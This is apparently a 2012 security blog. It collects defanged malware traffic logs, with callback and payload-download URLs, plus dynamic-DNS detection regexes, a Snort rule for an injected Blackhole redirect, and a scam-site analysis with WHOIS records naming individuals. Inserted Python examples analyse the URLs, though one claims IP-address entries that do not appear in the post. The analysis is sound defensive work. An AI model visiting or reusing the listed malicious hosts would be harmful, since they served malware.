hxxp://report.o7o3179a1k931wsk.com/?Y93o31=%96%C6%D3%A5%D4%D6a%D0n%A4%94%95ji%C2i%CF%9C%98e%DD%A3%A2g%9C%A7%CF%8Al%98%A2%98%95%98%DC%E6%AC%E9%EA%86%BF%5D%E4%9C%95tn%99f%9E_%9F%9F%DE%B0%D0%9C%90%C4%C0%7F%A6%9C%D3pu%A3%A7%A7%A4%A5%A5%60%B5m%A8hh%7C%7B%93d%A3~dd%B9%A7%AFa%A5%A0%9F%92iu%A0Y%A3%D7%D8%AD%9F%A2%A4%5E%9Fj%A0cagi%92a%9Bica%A7%A3%9BT%D9%AC%9D%89ic%9Fdf%AB%89<br />
<br />
hxxp://report.o7o3179a1k931wsk.com/?Y31716=%96%C6%D3%A5%D4%D6a%D0n%A4%94%95ji%C2i%CF%9C%98e%DD%A3%A2g%9C%A7%CF%8Af%96j%96%9A%98%DC%E6%AC%E9%EA%86%BF%5D%E4%9C%95tn%99f%9E_%9F%9F%DE%B0%D0%9C%90%C4%C0%7F%A0%9A%9Bnz%A3%A7%A7%A4%A5%A5%60%B5m%A8hh%7C%7B%93d%A3~dd%B9%A7%AFa%A5%A0%9F%92cshW%A8%D7%D8%AD%A0%A2%A4%5E%9Fh%A5cagi%92a%9Bica%A7%A3%9BT%D9%AC%9D%89cagbk%AB%89<br />
<br />
hxxp://report.o7o3179a1k931wsk.com/?Q31717=%96%C6%D3%A5%D4%D6a%D0n%A4%94%95ji%C2i%CF%9C%98e%DD%A3%A2g%9C%A7%CF%82f%96j%96%9B%98%DC%E6%AC%E9%EA%86%BF%5D%E4%9C%95tn%99f%9E_%9F%9F%DE%B0%D0%9C%90%C4%C0w%A0%9A%9Bn%7B%A3%A7%A7%A4%A5%A5%60%B5m%A8hh%7C%7B%93d%A3~dd%B9%A7%AFa%A5%A0%9F%8AcshW%A9%D7%D8%AD%A0%A2%A4%5E%9Fh%A6cagi%92a%9Bica%A7%A3%9BT%D9%AC%9D%81cagbl%AB%89<br />
<br />
hxxp://report.o7o3179a1k931wsk.com/?Q93120=%96%C6%D3%A5%D4%D6a%D0n%A4%94%95ji%C2i%CF%9C%98e%DD%A3%A2g%9C%A7%CF%82l%98d%97%94%98%DC%E6%AC%E9%EA%86%BF%5D%E4%9C%95tn%99f%9E_%9F%9F%DE%B0%D0%9C%90%C4%C0w%A6%9C%95ot%A3%A7%A7%A4%A5%A5%60%B5m%A8hh%7C%7B%93d%A3~dd%B9%A7%AFa%A5%A0%9F%8AiubX%A2%D7%D8%AD%9F%A2%A4%5E%9Fi%9Fcagi%92a%9Bica%A7%A3%9BT%D9%AC%9D%81icace%AB%89<br />
<br />
hxxp://update2.hpl4i1i6elvmn3.com/?i4=kdbTmsPWmJNlndHQZ5mSoZrI0arTnmpnnKfPpqPJlNnJWJHX3uCm2J3Vm9ep3s7hm1TQ2NGy0ceX1sdlj5%2BlzZicYcpuyc%2FbodRjZZyopdehl8anypZS<br />
<br />
hxxp://report.o7o3179a1k931wsk.com/?W79343=%96%C6%D3%A5%D4%D6a%D0n%A4%94%95ji%C2i%CF%9C%98e%DD%A3%A2g%9C%A7%CF%88j%9Ef%99%97%98%DC%E6%AC%E9%EA%86%BF%5D%E4%9C%95tn%99f%9E_%9F%9F%DE%B0%D0%9C%90%C4%C0%7D%A4%A2%97qw%A3%A7%A7%A4%A5%A5%60%B5m%A8hh%7C%7B%93d%A3~dd%B9%A7%AFa%A5%A0%9F%90g%7BdZ%A5%D7%D8%AD%9F%A2%A4%5E%9Fk%A2cagi%92a%9Bica%A7%A3%9BT%D9%AC%9D%87giceh%AB%89<br />
<br />
hxxp://update.9ik8rgxkc3zlg0.com/?xi=kdbTmsPWmI9wnsycpZfZo8eW36DNYGWcqKXXoZfGp8qSX8zapubZ59fPmOyp2pmV0ZXR1uTFntuoiH3duIPA2bG8oFnn1cttj8alz9ejxZipxpJsmcxw1srdn8ljsaWgaJCUotKo1ciF<br />
<br />
hxxp://billingshoper.com/p/?&lid=3060001&affid=60830&nid=F4C9B6B4&group=liv<br />
<br />
<br />
<br />
At this point, the user ran ComboFix, Malwarebytes and AVG. Then, after 5 hours, these occurred. I am unsure if they are related to the infection, but centralops reports the registered owner as:<br />
<br />
<pre style="font-family: 'Courier New', monospace; font-size: 13px;">person: Dariusz Mach
address: SuperHost.pl sp. z o.o.
address: ul. Slaska 9/1
address: 81-319 Gdynia
address: POLAND
phone: +48587396369
fax-no: +48587396368</pre>
<br />
hxxp://tiptoppoprock2.com/bv?type=js
<br />
<br />
hxxp://tiptoppoprock2.com/ga.js?W1u9=%98%D6%D9%D8%AC%A5%A0%B3%A7%B7%A0%A5%AFsf%96%A0%A3%8Bf%A8q%AA%9F%B3%B5%A4%B6%B1%A2%A2%A3%B1%A6%B0v_%89%E4%D6%BBn%A5_%EA%CE%E2%E7%D8%DF%DE%AC%A2%A4%A1%87<br />
<br />
1 minute later<br />
<br />
hxxp://tiptoppoprock2.com/gs.js?1&code=5053a968f1483&title=&keywords=&keywords_text=hollow%2Cnews%2Cny%2Cseptember%2Ccredit%2Cevents&ref=http%3A%2F%2Ftarrytown.patch.com%2F&u=7&pref=&utmcc=__utma%3D195079987.693177053.1333033673.1347020645.1347544109.23%2B__utmz%3D195079987.1344265429.12.4.utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3Dsuffolk%20county%20pd%20contract&bd=<br />
<br />
After nearly an hour, the system ran Windows updates and was immediately followed by the following GET requests (reverse chronological order here, oldest last). The /support/u and /support/ur are MIME octet-stream.<br />
<br />
<br />
<br />
hxxp://exasmicine.com/support/u<br />
hxxp://icturesofam.com/support/ur<br />
hxxp://icturesofam.com/support/u<br />
hxxp://icturesofam.com/support/u<br />
hxxp://icturesofam.com/support/u<br />
hxxp://exasmicine.com/support/u<br />
hxxp://menecalenesyny.com/support/u<br />
hxxp://uperctvalm.com/support/u<br />
hxxp://opateomin.com/u.php?0Q9oBPXEN0uECUgzEJ95RQsajz7vq1aG3F/2q5oNvBGAyHya0iCsG5//bBw9iKz11e/law==<br />
hxxp://yjbgcalof.com/support/u<br />
hxxp://dicasenowenuc.com/?ylOdR9GQqXquMlTvsmXlkaz1x3Ea+w==<br />
hxxp://dicasenowenuc.com/updates/msupdate.dat<br />
hxxp://sutonsbaym.com/updates/msupdate.dat<br />
hxxp://cguielinesfo.com/updates/msupdate.dat<br />
hxxp://cguielinesfo.com/updates/msupdate.dat<br />
hxxp://www.update.microsoft.com/v9/1/windowsupdate/redir/muv4wuredir.cab?1209142251<br />
<br />
<br />
exasmicine.com - Registrar is Bizcn.com<br />
menecalenesyny.com - Registrar is Bizcn.com<br />
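<br />
An added example, not part of the original post: one way to pivot on the list above is to look for the same URL path requested on several unrelated hosts, which is how /support/u and /updates/msupdate.dat appear in it, and to pull out the direct-to-IP requests. The URLs are a subset copied from the post; the function names, the min_hosts threshold and the COMMON_PATHS skip list are assumptions.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Subset of the requests listed in the post (defanged as in the post,
# long query strings omitted). Everything else here is illustrative.
LOGGED = [
    "hxxp://108.178.59.39/links/reveals_formed.php",
    "hxxp://175.41.28.157/api/urls/?ts=3e73d632&affid=60830",
    "hxxp://exasmicine.com/support/u",
    "hxxp://icturesofam.com/support/ur",
    "hxxp://icturesofam.com/support/u",
    "hxxp://menecalenesyny.com/support/u",
    "hxxp://uperctvalm.com/support/u",
    "hxxp://yjbgcalof.com/support/u",
    "hxxp://dicasenowenuc.com/updates/msupdate.dat",
    "hxxp://sutonsbaym.com/updates/msupdate.dat",
    "hxxp://cguielinesfo.com/updates/msupdate.dat",
    "hxxp://www.update.microsoft.com/v9/1/windowsupdate/redir/muv4wuredir.cab?1209142251",
]

# Assumption: paths that many legitimate hosts share and that would
# otherwise dominate the grouping in a real proxy log.
COMMON_PATHS = {"/", "/favicon.ico", "/robots.txt"}


def parse(url):
    """Return (hostname, path) for a plain or hxxp-defanged URL."""
    if url.lower().startswith("hxxp"):
        url = "http" + url[4:]
    parts = urlsplit(url)
    return (parts.hostname or "").lower(), parts.path or "/"


def is_ip_literal(host):
    """True when the host part is an IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def direct_ip_hosts(urls):
    """Hosts that were requested by IP address, sorted and de-duplicated."""
    return sorted({host for host, _ in map(parse, urls) if is_ip_literal(host)})


def shared_paths(urls, min_hosts=3):
    """Map each path seen on at least min_hosts distinct named hosts to those hosts."""
    hosts_by_path = defaultdict(set)
    for url in urls:
        host, path = parse(url)
        if not host or is_ip_literal(host) or path in COMMON_PATHS:
            continue
        hosts_by_path[path].add(host)
    return {
        path: sorted(hosts)
        for path, hosts in hosts_by_path.items()
        if len(hosts) >= min_hosts
    }


if __name__ == "__main__":
    print("direct-to-IP:", direct_ip_hosts(LOGGED))
    for path, hosts in shared_paths(LOGGED).items():
        print(path, "->", ", ".join(hosts))
```

In a real proxy log the grouping should be limited to a time window and one client, otherwise popular application paths will cross the threshold as well.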
<br />
<br />
<b>Updated FreeDNS Regex</b><br />
Posted 2012-09-14<br />
<br />
For those of you that find this useful.<br />
<br />
\.(mefound|keren|ftp1|edns|compress|authorizeddns|almostmy|4pu|1dumb|qhigh|proxydns|dyndns-ip|gr8domain|ns01|25u|ns3|4dq|ns1|portrelay|dnsrd|lflinkup|changeip|dns-stuff|dnset|faqserv|qpoe|4mydomain|cleansite|toythieves|trickip|kwik|dnsalias|verymad|twilightparadox|jumpingcrab|ignorelist|crabdance|chickenkiller|dvrdns|findhere|byinter|looking|qc|mooo|info|dyndns|dyndns-at-home|dyndns-at-work|dyndns-home|dyndns-office|dyndns-web|dyndns-blog|dyndns-wiki|dyndns-pics|zapto|sytes|servequake|servepics|servemp3|servehttp|servehalflife|servegame|serveftp|servecounterstrike|serveblog|servebeer|redirectme|bounceme|hopto|myvnc|no-ip|myftp|dlinkddns|everfocusddns|freeddns|bddns|ddns|lorexddns|newddns)\.(com|net|info|org|ms|me|vc|pl|mobi|us|name|tm|biz|fr|be|ws|dk|tv|to|at|la)<br />
<br />
<br />
<b>FreeDNS Provider Regex</b><br />
Posted 2012-08-13, updated 2012-08-14<br />
<br />
by Frank Angiolelli, CISSP<br />
<br />
Updated regex for free dynamic DNS providers.<br />
<br />
The leading . limits hits from legitimate sites. Enjoy.<br />
<br />
\.(dnsalias|verymad|twilightparadox|jumpingcrab|ignorelist|crabdance|chickenkiller|dvrdns|findhere|byinter|looking|qc|mooo|info|dyndns|dyndns-at-home|dyndns-at-work|dyndns-home|dyndns-office|dyndns-web|dyndns-blog|dyndns-wiki|dyndns-pics|zapto|sytes|servequake|servepics|servemp3|servehttp|servehalflife|servegame|serveftp|servecounterstrike|serveblog|servebeer|redirectme|bounceme|hopto|myvnc|no-ip|myftp|dlinkddns|everfocusddns|freeddns|bddns|ddns|lorexddns|newddns)\.(com|net|info|org|ms|me|vc|pl|mobi|us|name|tm|biz|fr|be|ws|dk|tv|to|at)$<br />
<br />
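An added example (not code from the original posts): the two regexes above differ in the trailing $, and this shows what each form does against full URL log entries versus the extracted hostname. The provider and TLD lists are a trimmed subset of the posts' lists, the function names are hypothetical, and log entries marked constructed are made up for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: trimmed subset of the labels and TLDs in the posts' regexes,
# kept short for readability. Use the full lists in production.
PROVIDERS = ["ftp1", "ddns", "dyndns", "no-ip", "mooo", "changeip", "zapto"]
TLDS = ["com", "net", "info", "org", "ms", "me", "mobi", "us", "biz", "to", "at"]

BODY = (r"\.(" + "|".join(re.escape(p) for p in PROVIDERS) + r")"
        r"\.(" + "|".join(TLDS) + r")")
UNANCHORED = re.compile(BODY, re.IGNORECASE)       # form without the trailing $
ANCHORED = re.compile(BODY + r"$", re.IGNORECASE)  # form with the trailing $

SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

SAMPLE_LOG = [
    "khigaijc.ddns.ms/stds/go.php?sid=1",                        # from the page
    "hxxp://lnuzdqhs.ddns.mobi/main.php?page=bd9afdd8df7aa34c",  # from the page
    "hxxp://example.ftp1.biz/",                                  # constructed
    "http://www.myddns.com/index.html",                          # constructed
    "http://cdn.ddns.media.example.com/logo.png",                # constructed
    "http://mirror.example.net/files/setup.ddns.net.zip",        # constructed
    "hxxp://www.update.microsoft.com/v9/1/windowsupdate/redir/muv4wuredir.cab?1209142251",  # from the page
]


def host_of(entry):
    """Hostname of a log entry given as a URL, a defanged hxxp URL, or host/path."""
    entry = re.sub(r"^hxxp", "http", entry.strip(), flags=re.IGNORECASE)
    if not SCHEME.match(entry):
        entry = "http://" + entry
    return (urlsplit(entry).hostname or "").rstrip(".")


def classify(entry):
    """Compare matching the raw log entry with matching the extracted hostname."""
    host = host_of(entry)
    hit = ANCHORED.search(host)
    return {
        "host": host,
        "raw_unanchored": bool(UNANCHORED.search(entry)),  # substring hit anywhere
        "raw_anchored": bool(ANCHORED.search(entry)),      # $ sees the URL tail
        "host_anchored": bool(hit),                        # suffix of the hostname
        "provider": f"{hit.group(1)}.{hit.group(2)}" if hit else None,
    }


def hunt(entries):
    """(host, provider domain) for entries whose hostname ends in a listed provider."""
    results = (classify(e) for e in entries)
    return [(r["host"], r["provider"]) for r in results if r["host_anchored"]]


def false_positives(entries):
    """Entries the unanchored form flags although the host is not under a provider."""
    return [e for e in entries
            if classify(e)["raw_unanchored"] and not classify(e)["host_anchored"]]


if __name__ == "__main__":
    for host, provider in hunt(SAMPLE_LOG):
        print(f"dynamic DNS host: {host} ({provider})")
    for entry in false_positives(SAMPLE_LOG):
        print(f"unanchored-only hit: {entry}")
```

The anchored form only works on a hostname field: against a full URL the $ is compared with the end of the path or query, so it never fires.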
<br />
<br />
<b>SQL Injection Redirect to Blackhole from Religious Site</b><br />
Posted 2012-05-09<br />
<br />
Written by Frank Angiolelli, CISSP<br />
<br />
<a href="http://www.pcmag.com/article2/0,2817,2403960,00.asp" target="_blank">Recent metrics from Symantec</a> are showing that religious sites are more often compromised or serving malicious content than adult content sites. In a recent analysis, I have encountered this myself and I will delve briefly into how the malicious event occurred.<br />
<br />
User searches in Google for religious content<br />
<br />
User clicks on the link, in this case, fassatiny.com, a youth religious website.<br />
<br />
Unbeknownst to the user or, likely, fassatiny.com, the website has been injected with obfuscated JavaScript code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMoqq0M_P_t-95XmjAHCcInSqwOtCojfywhvixG4howHOc9ZVbqqo9fWBss5AVUsHiICIJHBnlzoKGg5olgcsZPctLB0EwJ3-JiWU_rlW7nsKOun4g9YdU5pS8hWe8E8hTCqkwR9mnvI/s1600/frassatiny.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMoqq0M_P_t-95XmjAHCcInSqwOtCojfywhvixG4howHOc9ZVbqqo9fWBss5AVUsHiICIJHBnlzoKGg5olgcsZPctLB0EwJ3-JiWU_rlW7nsKOun4g9YdU5pS8hWe8E8hTCqkwR9mnvI/s640/frassatiny.jpg" width="640" /></a></div>
<br />
<ul>
<li>The result of this code is a GET request for: <b>khigaijc.ddns.ms/stds/go.php?sid=1</b></li>
<li><a href="http://jsunpack.jeek.org/?report=d55b34d070095158ed87123ef1d828c4c16f5139">http://jsunpack.jeek.org/?report=d55b34d070095158ed87123ef1d828c4c16f5139</a></li>
</ul>
<br />
<br />
<ul>
<li>khigaijc.ddns.ms/stds/go.php?sid=1 redirects you to: </li>
<li>hxxp://lnuzdqhs.ddns.mobi/main.php?page=bd9afdd8df7aa34c</li>
</ul>
<br />
<b><br /></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx1i7q8jwRjZ-fNOkzxP39_W3dxGvcEKrQV74QdiEBW0TfQC2wKeDQkLJZBxGPkMApbJH32vCVJbndnTr_XnslVxXuWrbgGda-u9RfjDuqVSwk9dHK-0OlgfoiafzA355UL3vYEVgz9to/s1600/blackhole.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx1i7q8jwRjZ-fNOkzxP39_W3dxGvcEKrQV74QdiEBW0TfQC2wKeDQkLJZBxGPkMApbJH32vCVJbndnTr_XnslVxXuWrbgGda-u9RfjDuqVSwk9dHK-0OlgfoiafzA355UL3vYEVgz9to/s640/blackhole.JPG" width="640" /></a></div>
<b><br /></b><br />
And you have yourself a new experience: malware via Blackhole and insecure religious websites. I in no way wish to pick on religious websites. They are far from the only insecure websites on the internet.<br />
<br />
Anyone can fall victim to this type of injection, and anyone can fall victim to exploits akin to this.<br />
<br />
Now, let's take this one step further:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPmRfWSlgwBt4jIbLubz3e3RUTSFuwiQbHJ5uW_rfZ3kv-zq9MJWLJufg9v8nlXJXirFptQ3o68AEcTPnV6Ax327hpdCS2N2dH8LwCyB3bagC6jOo6crOZKiur13hddABik_mX6gHU-Xw/s1600/sqlinjection.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPmRfWSlgwBt4jIbLubz3e3RUTSFuwiQbHJ5uW_rfZ3kv-zq9MJWLJufg9v8nlXJXirFptQ3o68AEcTPnV6Ax327hpdCS2N2dH8LwCyB3bagC6jOo6crOZKiur13hddABik_mX6gHU-Xw/s640/sqlinjection.JPG" width="608" /></a></div>
<br />
<br />
<b>Lotta trouble out there.</b><br />
<b><br /></b><br />
<b>Now, let's detect. How about snort?</b><br />
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Exploit: Malicious Obfuscated Javascript Redirect"; flow:from_server,established; content:"<script>i=0|3B|try{prototype|3B|}catch"; content:"</script>"; reference:url,jsunpack.jeek.org/?report=d55b34d070095158ed87123ef1d828c4c16f5139; reference:url,fortknoxnetworks.blogspot.com/2012/05/anatomy-of-compromised-religious-site.html; sid:98100014; rev:1;)<br />
<br />
<b>Other tools:</b><br />
Obfuscated javascript<br />
Nginx server<br />
URL strings consistent with Blackhole<br />
<br />
<br />
I put the trailing <script> into this rule in the desire to capture the entire script. You may have a better suggestion for the rule and I welcome it.<br />
<br />
As always, I welcome your comments, thoughts and suggestions. Follow me @fknsec.<br />
<br />
<b>thecheapostore.com - The face of Identity Theft?</b><br />
Posted 2012-03-23<br />
<br />
<span style="font-size: large;">TheCheapOStore.com - Everything is sold for 99 cents, including your identity?</span><br />
<br />
Thecheapostore.com is an anomaly in a world of cheap stuff and people searching for the cheapest stuff. At thecheapostore.com you can buy anything for 99 cents, but whether anything actually gets sold is another question.<br />
<br />
As you might guess, I am constantly making my friends and family aware of malicious internet "stuff". Apparently, they listen.<br />
<br />
My wife approached me yesterday to tell me what she considered a funny story about a website where she was trying to purchase something. The website was called thecheapostore.com. Apparently, everything is on auction and everything costs 99 cents.<br />
<br />
There were two funny things about it, she told me. The first was that when she tried to purchase, my network identity theft protection fired off and prevented her from going to the website. The second was that all auctions start at 99 cents and end in 30 minutes, but if you refresh your browser, the clock starts again.<br />
<br />
"DING!"<br />
<br />
So I asked her to show me the site. Here is my short analysis:<br />
<br />
The site itself is a simple front end showing "Latest Products", and it opens rather slowly, presumably because it is a DSL connection as reported by centralops.<br />
<br />
The products are presented to you in an iframe from another website, madsem.com<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtZNTAOoxep4c3YvNh3T9iBl5hbrwG4tFsCuQR_9LUoPkRSPQBqPQnycgwTwrfwttCDB31V14-gEihyphenhyphenIXqoRmvx-UyXNhK04WWJkpOQHk1HyyoLGRIrr9fPKl6hIblafJktAIMqioa80c/s1600/thecheapostore.com.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtZNTAOoxep4c3YvNh3T9iBl5hbrwG4tFsCuQR_9LUoPkRSPQBqPQnycgwTwrfwttCDB31V14-gEihyphenhyphenIXqoRmvx-UyXNhK04WWJkpOQHk1HyyoLGRIrr9fPKl6hIblafJktAIMqioa80c/s400/thecheapostore.com.jpg" width="400" /></a></div>
<br />
<br />
<iframe src="http://campaigns.madsem.com/magentoshops/index.php" width="350" height="280" frameborder="0" scrolling="no"></iframe><br />
<br />
<div style="text-align: center;">
<b>Now, go to madsem.com</b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<b>It says only.</b></div>
<div style="text-align: center;">
<b><span style="font-size: large;"><br /></span></b></div>
<div style="text-align: center;">
<b><span style="font-size: large;">"welcome Biatches :)"</span></b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKUkIMH2OUIKL4oiEJwx3Q0M0A4j25Rt8Cbyc8vMUJoRDNrDy2XIsVftw-cJPl2SbdIIvmAH5sIH4ifgEXEEAGfgkKuhPuWdvwQKQCxubIya0qmHiyXaog4rMt6ZjnIFD0E-hoSrSzNdk/s1600/welcomebiatches.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKUkIMH2OUIKL4oiEJwx3Q0M0A4j25Rt8Cbyc8vMUJoRDNrDy2XIsVftw-cJPl2SbdIIvmAH5sIH4ifgEXEEAGfgkKuhPuWdvwQKQCxubIya0qmHiyXaog4rMt6ZjnIFD0E-hoSrSzNdk/s1600/welcomebiatches.jpg" /></a></div>
<br />
So what exactly happens to your information when you click "Send"? Someone has it. And he thinks you're a biatch.<br />
<br />
My suggestion is to research websites before you send them your information or make a purchase.<br />
<br />
http://www.scamadviser.com/is-thecheapostore.com-safe.html<br />
http://www.webutation.net/go/review/thecheapostore.com#<br />
http://answers.yahoo.com/question/index?qid=20120314153644AArQVTz<br />
<br />
Registrant:<br />
Domains By Proxy, LLC<br />
DomainsByProxy.com<br />
15111 N. Hayden Rd., Ste 160, PMB 353<br />
Scottsdale, Arizona 85260<br />
United States<br />
<br />
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)<br />
<br />
IP Address:<br />
82.211.28.22<br />
ACCELERATED IT SERVICES GMBH<br />
Germany<br />
DAWN-SERVER.DE<br />
ip2location.com lists this as a DSL connection<br />
<br />
Queried whois.ripe.net with "-B 82.211.28.22"...<br />
<br />
% Information related to '82.211.28.0 - 82.211.28.255'<br />
<br />
inetnum: 82.211.28.0 - 82.211.28.255<br />
netname: DE-MEDIA-IP-NETWORK-20110823<br />
descr: Media IP Network<br />
country: DE<br />
admin-c: HN1156-RIPE<br />
tech-c: HN1156-RIPE<br />
status: ASSIGNED PA<br />
remarks: ************************************************<br />
remarks: * ABUSE CONTACT: medianetworksg@gmail.com IN *<br />
remarks: * CASE OF HACK ATTACKS,ILLEGAL ACTIVITY, *<br />
remarks: * VIOLATION, SCANS, PROBES, SPAM, ETC. *<br />
remarks: ************************************************<br />
mnt-by: ACCELERATED-MNT<br />
changed: nk@accelerated.de 20110823<br />
source: RIPE<br />
<br />
person: Hang Nguyen<br />
address: Duong 8B Pho 4 Bin An, Quan 2<br />
address: Saigon, Vietnam<br />
phone: +84 906482860<br />
e-mail: medianetworks@gmail.com<br />
nic-hdl: HN1156-RIPE<br />
mnt-by: ACCELERATED-MNT<br />
changed: lir@accelerated.de 20110623<br />
source: RIPE<br />
<br />
% Information related to '82.211.0.0/18AS31400'<br />
<br />
route: 82.211.0.0/18<br />
descr: IP-Routing by Accelerated IT Services GmbH<br />
origin: AS31400<br />
mnt-by: ACCELERATED-MNT<br />
changed: nk@accelerated.de 20080709<br />
source: RIPE<br />
<br />
Traceroute<br />
<br />
6 TenGigE0-0-1-0.GW14.BOS4.ALTER.NET (152.179.2.97) 80.593 ms 81.399 ms 81.276 ms<br />
7 0.ge-0-3-0.XL4.BOS4.ALTER.NET (152.63.17.134) 80.176 ms 86.179 ms 85.477 ms<br />
8 0.xe-7-0-3.XL4.IAD8.ALTER.NET (152.63.2.106) 105.865 ms 103.278 ms 112.648 ms<br />
9 0.ae4.BR1.IAD8.ALTER.NET (152.63.33.121) 104.557 ms 117.249 ms 97.695 ms<br />
10 194.25.211.17 (194.25.211.17) 102.064 ms 111.042 ms 182.673 ms<br />
11 f-ed6-i.F.DE.NET.DTAG.DE (62.156.131.242) 259.001 ms 194.25.6.90 (194.25.6.90) 256.655 ms 251.036 ms<br />
12 80.156.160.162 (80.156.160.162) 260.455 ms 242.994 ms 241.802 ms<br />
13 fra4.xe-0-1-0.accelerated.de (84.200.230.81) 225.309 ms 224.549 ms 212.820 ms<br />
14 82.211.28.22 (82.211.28.22) 228.830 ms 216.740 ms 215.035 ms<br />
<br />
<b>Why Forwarding Email to a Free Email Provider is a Bad Idea</b><br />
Posted 2012-03-08<br />
<span style="font-size: x-small;">Written by Frank Angiolelli, CISSP</span><br />
<span style="font-size: x-small;">www.fortknoxnetworks.com</span><br />
<br />
In many cases, we must balance availability against confidentiality. The two are not necessarily mutually exclusive, but in general by increasing confidentiality you decrease availability at least in terms of methods, locations and speed of access.<br />
<br />
<b><span style="font-size: large;">Why Forwarding Your Email to A Free Email Provider is Good</span></b><br />
<br />
The benefits of such an action are easy to see:<br />
1. Easier access to the emails.<br />
2. Accessible from any computer without hoops to jump.<br />
3. Easier to configure phones and mobile devices to receive<br />
4. Synchronization options with mobile devices<br />
<br />
I have seen cases where this has been done by individuals that just wanted the convenience, did not know how to access their email securely, and I have seen cases where a cell phone provider was just trying to help someone access their email but did not know the proper settings, so they assisted with forwarding all the email and set up the phone to receive the forwarded mail.<br />
<br />
<b><span style="font-size: large;">Why Forwarding Your Email to A Free Email Provider is Bad</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Z1zO6pwvVQkEfyqPOveg7YS59Xwi17xDSs65Mx5JFu9NUZL9w3rRg-YdDDkFT7qScHechc-r9Cbb41DPs10vWHUzpiOxgfUtEJz75zEXPTyYmi2dB1MtRf95BaarAJL4RgD-QDwsCC0/s1600/1.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Z1zO6pwvVQkEfyqPOveg7YS59Xwi17xDSs65Mx5JFu9NUZL9w3rRg-YdDDkFT7qScHechc-r9Cbb41DPs10vWHUzpiOxgfUtEJz75zEXPTyYmi2dB1MtRf95BaarAJL4RgD-QDwsCC0/s320/1.jpg" width="309" /></a></div>
<br />
The costs associated with this can be tremendous. The primary cost is the considerable lessening of confidentiality. While it is true that most free email solutions provide encryption by default, these services are available to anyone on the web from any computer without restriction. Additionally, their password reset mechanisms are available to anyone on the web.<br />
<br />
Beyond that, there is no incident response team attempting to identify unauthorized accesses. Furthermore, audits of who is accessing the system are not possible.<br />
<br />
This sets up your organization for the possibility of a malicious individual creating a channel to read corporate email without detection. <a href="http://www.geek.com/articles/news/anonymous-leaks-fbi-conference-call-about-anonymous-2012023/" target="_blank">Take for example the FBI Conference call which was recorded by Anonymous. </a>In this case, an FBI agent had apparently forwarded the conference call details to a free email provider, but the account password had been compromised by the hackers. The result was hackers recording the conference call, which ironically was related to hacking investigations, and posting it to the internet.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMplA7ygB3stF7FECTQKPlsdgsLFOq-xNO0IMKJ2WEJglPGprl-7NEjMUib2IgWuq9a3ft4muCHE4Cr433NM8XLXoHztuGN77FDtCPjyQvQT2mtf0Yb5oNrk5aPshIbWTTX5LM12TRJ2U/s1600/anti.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMplA7ygB3stF7FECTQKPlsdgsLFOq-xNO0IMKJ2WEJglPGprl-7NEjMUib2IgWuq9a3ft4muCHE4Cr433NM8XLXoHztuGN77FDtCPjyQvQT2mtf0Yb5oNrk5aPshIbWTTX5LM12TRJ2U/s200/anti.jpg" width="200" /></a></div>
<br />
What is worse than someone posting the information to the internet? Someone not posting the information and silently, persistently reading the email and information without detection or limits.<br />
<br />
In this case where a phone conference was hacked, the forwarding of email to a free email provider was used to further gain access to secure operations, in this case a conference call discussing current investigations. Without disclosing that this had occurred, the malicious individuals could have monitored the email for any other systems which they could access and maintained or even extended their access.<br />
<br />
How To Prevent This<br />
1. Block access to webmail providers<br />
2. Monitor mail servers for email forwarding<br />
3. Implement DLP systems<br />
4. Ensure this behavior is restricted by policy<br />
5. Train employees <br />
<br />
As always, I welcome thoughts and suggestions.<br />
<br />
<b>Converting RRAS Logs Into MySQL Database</b><br />
Posted 2012-02-14<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<span style="font-size: x-small;">Written By: Frank Angiolelli, CISSP</span><br />
<a href="http://www.fortknoxnetworks.com/"><span style="font-size: x-small;">www.fortknoxnetworks.com</span></a><br />
<br />
This discussion is about how to automatically pull the RRAS files and
convert them into a formatted CSV file which can be imported
automatically into a SQL database for querying and reporting.
There are tools available that let you open and view the files manually; discussion of them is outside the scope of this article.<br />
<br />
